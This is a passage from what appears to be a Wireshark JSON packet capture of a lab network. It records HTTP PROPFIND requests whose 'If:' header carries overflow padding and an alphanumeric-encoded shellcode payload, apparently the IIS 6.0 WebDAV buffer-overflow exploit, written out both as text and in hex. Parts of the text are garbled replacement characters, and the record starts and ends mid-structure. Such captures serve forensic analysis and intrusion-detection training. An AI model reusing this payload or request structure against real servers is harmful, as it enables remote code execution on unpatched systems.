<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>VVYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBYlHharm0ipIpS0u9iUMaY0qTtKB0NPRkqBLLBkPRMDbksBlhlOwGMzmVNQkOTlmlQQqllBLlMPGQVoZmjaFgXbIbr2NwRk1BzpDKmzOLtKPLjqqhJCa8za8QPQtKaImPIqgctKMyZxk3MjniRkMddKM16vnQYoVLfaXOjm9quwP8Wp0ul6LCqm9hOKamNDCEGtnxBkOhMTKQVs2FtKLLPKdKNxKlYqZ3tKLDDKYqXPdIq4nDnDokqKS1pY1Jb1yoK0Oo1OQJbkZrHkrmaMbHLsLrYpkPBHRWrSlraO1DS8nlbWmVkW9oHUtxV0M1IpypKyi4Ntb0bHNIu00kypioIENpNpPP201020a0npS8xjLOGogpIoweF7PjkUS8Upw814n5PhLBipjqqLriXfqZlPr6b7ph3iteadqQKOweCUEpd4JlYopN9xbUHl0hzPWEVBR6yofu0j9pQZkTqFR7oxKRyIfhoo9oHUDKp63QZVpKqH0OnrbmlN2JmpoxM0N0ypKP0QRJipphpX6D0Sk5ioGeBmDX9pkQ9pM0r3R6pPBJKP0Vb3B738KRxYFh1OIoHU9qUsNIUv1ehnQKqIomr5Og4IYOgxLPkPM0yp0kS9RLplaUT22V2UBLD4RUqbs5LqMbOC1Np1gPdjkNUpBU9k1q8oypm19pM0NQyK9rmL9wsYersPK2LOjbklmF4JztkWDFjtmObhMDIwyn90SE7xMa7kKN7PYrmLywcZN4IwSVZtMOqxlTLGIrn4ko1zKdn7P0B5IppEmyBUjEaOUsAA>\r\n",
|
||
"\\r\\n": "",
|
||
"http.request.full_uri": "http://192.168.68.1/",
|
||
"http.request": "1",
|
||
"http.request_number": "1",
|
||
"http.response_in": "253"
|
||
}
|
||
}
|
||
}
|
||
},
|
||
{
|
||
"_index": "packets-2020-07-17",
|
||
"_type": "doc",
|
||
"_score": null,
|
||
"_source": {
|
||
"layers": {
|
||
"frame": {
|
||
"frame.interface_id": "0",
|
||
"frame.interface_id_tree": {
|
||
"frame.interface_name": "\\Device\\NPF_{A3208914-5057-4474-9535-A579B0FE0EE5}"
|
||
},
|
||
"frame.encap_type": "1",
|
||
"frame.time": "Jul 17, 2020 03:19:53.563056000 SE Asia Standard Time",
|
||
"frame.offset_shift": "0.000000000",
|
||
"frame.time_epoch": "1594930793.563056000",
|
||
"frame.time_delta": "0.000004000",
|
||
"frame.time_delta_displayed": "0.031922000",
|
||
"frame.time_relative": "16.813996000",
|
||
"frame.number": "263",
|
||
"frame.len": "323",
|
||
"frame.cap_len": "323",
|
||
"frame.marked": "0",
|
||
"frame.ignored": "0",
|
||
"frame.protocols": "eth:ethertype:ip:tcp:http",
|
||
"frame.coloring_rule.name": "HTTP",
|
||
"frame.coloring_rule.string": "http || tcp.port == 80 || http2"
|
||
},
|
||
"eth": {
|
||
"eth.dst": "00:0c:29:50:92:ec",
|
||
"eth.dst_tree": {
|
||
"eth.dst_resolved": "VMware_50:92:ec",
|
||
"eth.dst.oui": "3113",
|
||
"eth.dst.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:50:92:ec",
|
||
"eth.addr_resolved": "VMware_50:92:ec",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.dst.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.dst.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.src": "00:0c:29:53:25:34",
|
||
"eth.src_tree": {
|
||
"eth.src_resolved": "VMware_53:25:34",
|
||
"eth.src.oui": "3113",
|
||
"eth.src.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:53:25:34",
|
||
"eth.addr_resolved": "VMware_53:25:34",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.src.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.src.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.type": "0x00000800"
|
||
},
|
||
"ip": {
|
||
"ip.version": "4",
|
||
"ip.hdr_len": "20",
|
||
"ip.dsfield": "0x00000000",
|
||
"ip.dsfield_tree": {
|
||
"ip.dsfield.dscp": "0",
|
||
"ip.dsfield.ecn": "0"
|
||
},
|
||
"ip.len": "309",
|
||
"ip.id": "0x00007f66",
|
||
"ip.flags": "0x00004000",
|
||
"ip.flags_tree": {
|
||
"ip.flags.rb": "0",
|
||
"ip.flags.df": "1",
|
||
"ip.flags.mf": "0"
|
||
},
|
||
"ip.frag_offset": "0",
|
||
"ip.ttl": "64",
|
||
"ip.proto": "6",
|
||
"ip.checksum": "0x0000b0f5",
|
||
"ip.checksum.status": "2",
|
||
"ip.src": "192.168.68.21",
|
||
"ip.addr": "192.168.68.21",
|
||
"ip.src_host": "192.168.68.21",
|
||
"ip.host": "192.168.68.21",
|
||
"ip.dst": "192.168.68.1",
|
||
"ip.addr": "192.168.68.1",
|
||
"ip.dst_host": "192.168.68.1",
|
||
"ip.host": "192.168.68.1"
|
||
},
|
||
"tcp": {
|
||
"tcp.srcport": "45101",
|
||
"tcp.dstport": "80",
|
||
"tcp.port": "45101",
|
||
"tcp.port": "80",
|
||
"tcp.stream": "47",
|
||
"tcp.len": "257",
|
||
"tcp.seq": "1449",
|
||
"tcp.seq_raw": "649120213",
|
||
"tcp.nxtseq": "1706",
|
||
"tcp.ack": "1",
|
||
"tcp.ack_raw": "1966384175",
|
||
"tcp.hdr_len": "32",
|
||
"tcp.flags": "0x00000018",
|
||
"tcp.flags_tree": {
|
||
"tcp.flags.res": "0",
|
||
"tcp.flags.ns": "0",
|
||
"tcp.flags.cwr": "0",
|
||
"tcp.flags.ecn": "0",
|
||
"tcp.flags.urg": "0",
|
||
"tcp.flags.ack": "1",
|
||
"tcp.flags.push": "1",
|
||
"tcp.flags.reset": "0",
|
||
"tcp.flags.syn": "0",
|
||
"tcp.flags.fin": "0",
|
||
"tcp.flags.str": "·······AP···"
|
||
},
|
||
"tcp.window_size_value": "502",
|
||
"tcp.window_size": "64256",
|
||
"tcp.window_size_scalefactor": "128",
|
||
"tcp.checksum": "0x000036fd",
|
||
"tcp.checksum.status": "2",
|
||
"tcp.urgent_pointer": "0",
|
||
"tcp.options": "01:01:08:0a:89:ad:cb:44:00:00:00:00",
|
||
"tcp.options_tree": {
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.timestamp": "08:0a:89:ad:cb:44:00:00:00:00",
|
||
"tcp.options.timestamp_tree": {
|
||
"tcp.option_kind": "8",
|
||
"tcp.option_len": "10",
|
||
"tcp.options.timestamp.tsval": "2309868356",
|
||
"tcp.options.timestamp.tsecr": "0"
|
||
}
|
||
},
|
||
"tcp.analysis": {
|
||
"tcp.analysis.initial_rtt": "0.015514000",
|
||
"tcp.analysis.bytes_in_flight": "1705",
|
||
"tcp.analysis.push_bytes_sent": "1705"
|
||
},
|
||
"Timestamps": {
|
||
"tcp.time_relative": "0.015540000",
|
||
"tcp.time_delta": "0.000004000"
|
||
},
|
||
"tcp.payload": "44:58:39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a",
|
||
"tcp.segment_data": "44:58:39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"tcp.segments": {
|
||
"tcp.segment": "262",
|
||
"tcp.segment": "263",
|
||
"tcp.segment.count": "2",
|
||
"tcp.reassembled.length": "1705",
|
||
"tcp.reassembled.data": "50:52:4f:50:46:49:4e:44:20:2f:20:48:54:54:50:2f:31:2e:31:0d:0a:48:6f:73:74:3a:20:31:39:32:2e:31:36:38:2e:36:38:2e:31:0d:0a:55:73:65:72:2d:41:67:65:6e:74:3a:20:4d:6f:7a:69:6c:6c:61:2f:34:2e:30:20:28:63:6f:6d:70:61:74:69:62:6c:65:3b:20:4d:53:49:45:20:36:2e:30:3b:20:57:69:6e:64:6f:77:73:20:4e:54:20:35:2e:31:29:0d:0a:43:6f:6e:74:65:6e:74:2d:4c:65:6e:67:74:68:3a:20:30:0d:0a:49:66:3a:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:69:71:6b:6c:53:78:6e:54:65:61:72:56:63:47:5a:70:6c:59:79:6b:6a:55:41:6a:46:49:65:65:48:41:54:57:54:45:66:6f:79:65:6d:54:61:48:65:61:64:48:74:59:73:46:51:4c:61:42:52:43:4d:76:6a:78:67:6e:65:77:42:4f:4c:51:45:4e:47:79:6d:6c:42:44:57:73:71:56:45:70:59:4e:4a:79:6e:52:77:7a:59:4a:5a:6c:57:43:4b:e4:b9:b6:e7:91:b7:e5:a5:93:e5:99:ac:e4:a9:a2:e5:a9:b4:e5:91:83:e6:9d:9a:e5:9d:ac:e4:b5:ab:e6:91:af:e6:ad:8a:e6:99:ad:e7:89:ae:e7:85:a7:e5:85:8c:c8:82:c8:82:e1:8b:80:e6:a0:83:e5:9d:99:e7:8d:94:e6:9d:b8:e6:99:8b:e4:9d:a5:e6:9d:b5:e6:bd:81:e4:a1:a3:e7:85:b2:e6:a1:8c:e7:85:ad:e4:89:92:e4:ad:a2:e4:99:a5:e7:95:89:e6:bd:ab:e4:bd:b8:e6:b5:a1:e5:99:a9:e4:8d:8a:e1:8f:80:e6:a0:83:3e:20:28:4e:6f:74:20:3c:6c:6f:63:6b:74:6f:6b:65:6e:3a:77:72:69:74:65:31:3e:29:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:43:64:77:58:48:67:77:4c:73:75:43:79:56:58:75:71:51:4b:42:61:78:71:63:43:65:42:70:68:63:74:77:70:69:64:51:42:59:4a:69:64:4e:56:4b:67:46:48:50:79:56:66:52:65:72:51:43:6f:45:72:75:76:49:5a:63:47:65:5a:4e:63:56:46:50:58:41:7a:68:70:70:62:79:7a:61:57:68:57:4b:6f:70:4f:4c:44:57:5a:4e:49:43:54:4b:e6:95:98:e5:a1:8c:e6:bd:98:e6:9d:8c:e5:8d:82:e6:85:a9:e4:b9:89:e7:8d:b4:e7:91:88:e5:85:84:e6:8d:95:e6:91:92:e6:9d:8d:e6:ad:8b:e1:8f:80:e6:a0:83:ef:8e:8d:e7:9e:bd:e5:a9:87:e4:85:9a:e7:81:94:e4:95:92:e1:8f:80:e6:a0:83:e5:91:ad:e6:9d:aa:e7:8d:ab:e6:8d:a1:e4:99:af:e6:8d:98:e6:bd:b2:e7:a1:a3:e6:82:82:e6:a0:81:eb:81:ac:e7:9e:bc:ef:80:81:e7:9e:be:e2:95:a3:e7:9e:bb:e1:84:94:e7:9e:ba:ef:89:84:e7:9e:bb:e4:85:81:e4:85:81:ee:b8:a2:e7:9e:bb:e9:a0:81:e7:9e:bc:e2:89:a5:e7:9e:be:e2:95:a3:e7:9e:bb:e9:91:af:cf:80:ed:91:81:e7:9e:bd:e4:a3:93:e7:9e:bb:e2:87:a0:e7:9e:bf:ef:84:82:e7:9e:bb:ef:b0:82:e7:9e:bb:ef:80:81:e7:9e:be:e8:b0:84:e7:9e:bd:e8:b0:85:e7:9e:bd:e2:95:a3:e7:9e:bb:e9:91:8f:cf:80:ed:91:81:e7:9e:bd:e8:8a:85:e7:9e:bb:e2:95:a3:e7:9e:bb:e9:82:90:e9:82:90:e6:96:91:e7:9e:be:e5:b9:94:ec:9a:83:e4:84:8a:56:56:59:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:6a:58:41:51:41:44:41:5a:41:42:41:52:41:4c:41:59:41:49:41:51:41:49:41:51:41:49:41:68:41:41:41:5a:31:41:49:41:49:41:4a:31:31:41:49:41:49:41:42:41:42:41:42:51:49:31:41:49:51:49:41:49:51:49:31:31:31:41:49:41:4a:51:59:41:5a:42:41:42:41:42:41:42:41:42:6b:4d:41:47:42:39:75:34:4a:42:59:6c:48:68:61:72:6d:30:69:70:49:70:53:30:75:39:69:55:4d:61:59:30:71:54:74:4b:42:30:4e:50:52:6b:71:42:4c:4c:42:6b:50:52:4d:44:62:6b:73:42:6c:68:6c:4f:77:47:4d:7a:6d:56:4e:51:6b:4f:54:6c:6d:6c:51:51:71:6c:6c:42:4c:6c:4d:50:47:51:56:6f:5a:6d:6a:61:46:67:58:62:49:62:72:32:4e:77:52:6b:31:42:7a:70:44:4b:6d:7a:4f:4c:74:4b:50:4c:6a:71:71:68:4a:43:61:38:7a:61:38:51:50:51:74:4b:61:49:6d:50:49:71:67:63:74:4b:4d:79:5a:78:6b:33:4d:6a:6e:69:52:6b:4d:64:64:4b:4d:31:36:76:6e:51:59:6f:56:4c:66:61:58:4f:6a:6d:39:71:75:77:50:38:57:70:30:75:6c:36:4c:43:71:6d:39:68:4f:4b:61:6d:4e:44:43:45:47:74:6e:78:42:6b:4f:68:4d:54:4b:51:56:73:32:46:74:4b:4c:4c:50:4b:64:4b:4e:78:4b:6c:59:71:5a:33:74:4b:4c:44:44:4b:59:71:58:50:64:49:71:34:6e:44:6e:44:6f:6b:71:4b:53:31:70:59:31:4a:62:31:79:6f:4b:30:4f:6f:31:4f:51:4a:62:6b:5a:72:48:6b:72:6d:61:4d:62:48:4c:73:4c:72:59:70:6b:50:42:48:52:57:72:53:6c:72:61:4f:31:44:53:38:6e:6c:62:57:6d:56:6b:57:39:6f:48:55:74:78:56:30:4d:31:49:70:79:70:4b:79:69:34:4e:74:62:30:62:48:4e:49:75:30:30:6b:79:70:69:6f:49:45:4e:70:4e:70:50:50:32:30:31:30:32:30:61:30:6e:70:53:38:78:6a:4c:4f:47:6f:67:70:49:6f:77:65:46:37:50:6a:6b:55:53:38:55:70:77:38:31:34:6e:35:50:68:4c:42:69:70:6a:71:71:4c:72:69:58:66:71:5a:6c:50:72:36:62:37:70:68:33:69:74:65:61:64:71:51:4b:4f:77:65:43:55:45:70:64:34:4a:6c:59:6f:70:4e:39:78:62:55:48:6c:30:68:7a:50:57:45:56:42:52:36:79:6f:66:75:30:6a:39:70:51:5a:6b:54:71:46:52:37:6f:78:4b:52:79:49:66:68:6f:6f:39:6f:48:55:44:4b:70:36:33:51:5a:56:70:4b:71:48:30:4f:6e:72:62:6d:6c:4e:32:4a:6d:70:6f:78:4d:30:4e:30:79:70:4b:50:30:51:52:4a:69:70:70:68:70:58:36:44:30:53:6b:35:69:6f:47:65:42:6d:44:58:39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"http": {
|
||
"PROPFIND / HTTP/1.1\\r\\n": {
|
||
"_ws.expert": {
|
||
"http.chat": "",
|
||
"_ws.expert.message": "PROPFIND / HTTP/1.1\\r\\n",
|
||
"_ws.expert.severity": "2097152",
|
||
"_ws.expert.group": "33554432"
|
||
},
|
||
"http.request.method": "PROPFIND",
|
||
"http.request.uri": "/",
|
||
"http.request.version": "HTTP/1.1"
|
||
},
|
||
"http.host": "192.168.68.1",
|
||
"http.request.line": "Host: 192.168.68.1\r\n",
|
||
"http.user_agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
|
||
"http.request.line": "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n",
|
||
"http.content_length_header": "0",
|
||
"http.content_length_header_tree": {
|
||
"http.content_length": "0"
|
||
},
|
||
"http.request.line": "Content-Length: 0\r\n",
|
||
"http.request.line": "If: <http://192.168.68.1:80/iqklSxnTearVcGZplYykjUAjFIeeHATWTEfoyemTaHeadHtYsFQLaBRCMvjxgnewBOLQENGymlBDWsqVEpYNJynRwzYJZlWCK<43><4B><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> (Not <locktoken:write1>) <http://192.168.68.1:80/CdwXHgwLsuCyVXuqQKBaxqcCeBphctwpidQBYJidNVKgFHPyVfRerQCoEruvIZcGeZNcVFPXAzhppbyzaWhWKopOLDWZNICTK<54><4B><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>VVYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBYlHharm0ipIpS0u9iUMaY0qTtKB0NPRkqBLLBkPRMDbksBlhlOwGMzmVNQkOTlmlQQqllBLlMPGQVoZmjaFgXbIbr2NwRk1BzpDKmzOLtKPLjqqhJCa8za8QPQtKaImPIqgctKMyZxk3MjniRkMddKM16vnQYoVLfaXOjm9quwP8Wp0ul6LCqm9hOKamNDCEGtnxBkOhMTKQVs2FtKLLPKdKNxKlYqZ3tKLDDKYqXPdIq4nDnDokqKS1pY1Jb1yoK0Oo1OQJbkZrHkrmaMbHLsLrYpkPBHRWrSlraO1DS8nlbWmVkW9oHUtxV0M1IpypKyi4Ntb0bHNIu00kypioIENpNpPP201020a0npS8xjLOGogpIoweF7PjkUS8Upw814n5PhLBipjqqLriXfqZlPr6b7ph3iteadqQKOweCUEpd4JlYopN9xbUHl0hzPWEVBR6yofu0j9pQZkTqFR7oxKRyIfhoo9oHUDKp63QZVpKqH0OnrbmlN2JmpoxM0N0ypKP0QRJipphpX6D0Sk5ioGeBmDX9pkQ9pM0r3R6pPBJKP0Vb3B738KRxYFh1OIoHU9qUsNIUv1ehnQKqIomr5Og4IYOgxLPkPM0yp0kS9RLplaUT22V2UBLD4RUqbs5LqMbOC1Np1gPdjkNUpBU9k1q8oypm19pM0NQyK9rmL9wsYersPK2LOjbklmF4JztkWDFjtmObhMDIwyn90SE7xMa7kKN7PYrmLywcZN4IwSVZtMOqxlTLGIrn4ko1zKdn7P0B5IppEmyBUjEaOUsAA>\r\n",
|
||
"\\r\\n": "",
|
||
"http.request.full_uri": "http://192.168.68.1/",
|
||
"http.request": "1",
|
||
"http.request_number": "1",
|
||
"http.response_in": "267"
|
||
}
|
||
}
|
||
}
|
||
},
|
||
{
|
||
"_index": "packets-2020-07-17",
|
||
"_type": "doc",
|
||
"_score": null,
|
||
"_source": {
|
||
"layers": {
|
||
"frame": {
|
||
"frame.interface_id": "0",
|
||
"frame.interface_id_tree": {
|
||
"frame.interface_name": "\\Device\\NPF_{A3208914-5057-4474-9535-A579B0FE0EE5}"
|
||
},
|
||
"frame.encap_type": "1",
|
||
"frame.time": "Jul 17, 2020 03:19:53.567883000 SE Asia Standard Time",
|
||
"frame.offset_shift": "0.000000000",
|
||
"frame.time_epoch": "1594930793.567883000",
|
||
"frame.time_delta": "0.000006000",
|
||
"frame.time_delta_displayed": "0.004827000",
|
||
"frame.time_relative": "16.818823000",
|
||
"frame.number": "275",
|
||
"frame.len": "321",
|
||
"frame.cap_len": "321",
|
||
"frame.marked": "0",
|
||
"frame.ignored": "0",
|
||
"frame.protocols": "eth:ethertype:ip:tcp:http",
|
||
"frame.coloring_rule.name": "HTTP",
|
||
"frame.coloring_rule.string": "http || tcp.port == 80 || http2"
|
||
},
|
||
"eth": {
|
||
"eth.dst": "00:0c:29:50:92:ec",
|
||
"eth.dst_tree": {
|
||
"eth.dst_resolved": "VMware_50:92:ec",
|
||
"eth.dst.oui": "3113",
|
||
"eth.dst.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:50:92:ec",
|
||
"eth.addr_resolved": "VMware_50:92:ec",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.dst.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.dst.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.src": "00:0c:29:53:25:34",
|
||
"eth.src_tree": {
|
||
"eth.src_resolved": "VMware_53:25:34",
|
||
"eth.src.oui": "3113",
|
||
"eth.src.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:53:25:34",
|
||
"eth.addr_resolved": "VMware_53:25:34",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
